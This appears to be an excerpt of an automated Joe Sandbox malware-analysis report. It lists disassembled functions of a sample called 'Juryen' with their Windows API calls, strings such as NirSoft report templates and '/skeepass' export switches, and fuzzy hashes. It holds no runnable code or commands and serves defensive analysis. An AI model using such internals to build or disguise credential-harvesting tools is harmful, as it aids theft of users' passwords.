                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                    • String ID: ---
                                                                    • API String ID: 3437578500-2854292027
                                                                    • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                    • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                    Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041087D
                                                                    • memset.MSVCRT ref: 00410892
                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                    • String ID:
                                                                    • API String ID: 1010922700-0
                                                                    • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                    • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                    Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                    • malloc.MSVCRT ref: 004186B7
                                                                    • free.MSVCRT ref: 004186C7
                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                    • free.MSVCRT ref: 004186E0
                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                    • malloc.MSVCRT ref: 004186FE
                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                    • free.MSVCRT ref: 00418716
                                                                    • free.MSVCRT ref: 0041872A
                                                                    • free.MSVCRT ref: 00418749
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free$FullNamePath$malloc$Version
                                                                    • String ID: |A
                                                                    • API String ID: 3356672799-1717621600
                                                                    • Opcode ID: cf4da308e8b77386535cb07368452b59c4a465ddf093543d96db502a43b7ae5e
                                                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                    • Opcode Fuzzy Hash: cf4da308e8b77386535cb07368452b59c4a465ddf093543d96db502a43b7ae5e
                                                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                    Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                    • API String ID: 2081463915-1959339147
                                                                    • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                    • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                    Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                    • API String ID: 2012295524-70141382
                                                                    • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                    • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                    Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                    • API String ID: 667068680-3953557276
                                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                    Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                    • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1700100422-0
                                                                    • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                    • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                    Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                    • String ID:
                                                                    • API String ID: 552707033-0
                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                    Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                    • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                    • strchr.MSVCRT ref: 0040C140
                                                                    • strchr.MSVCRT ref: 0040C151
                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                    • memset.MSVCRT ref: 0040C17A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                    • String ID: 4$h
                                                                    • API String ID: 4066021378-1856150674
                                                                    • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                    • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                    Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf
                                                                    • String ID: %%0.%df
                                                                    • API String ID: 3473751417-763548558
                                                                    • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                    • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                    Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                    • GetParent.USER32(?), ref: 00406136
                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                    • String ID: A
                                                                    • API String ID: 2892645895-3554254475
                                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                    Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                    • memset.MSVCRT ref: 0040DA23
                                                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                    • String ID: caption
                                                                    • API String ID: 973020956-4135340389
                                                                    • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                    • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                    Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                    • API String ID: 1283228442-2366825230
                                                                    • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                    • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                    Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • wcschr.MSVCRT ref: 00413972
                                                                    • wcscpy.MSVCRT ref: 00413982
                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                    • wcscpy.MSVCRT ref: 004139D1
                                                                    • wcscat.MSVCRT ref: 004139DC
                                                                    • memset.MSVCRT ref: 004139B8
                                                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                    • memset.MSVCRT ref: 00413A00
                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                    • wcscat.MSVCRT ref: 00413A27
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                    • String ID: \systemroot
                                                                    • API String ID: 4173585201-1821301763
                                                                    • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                    • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
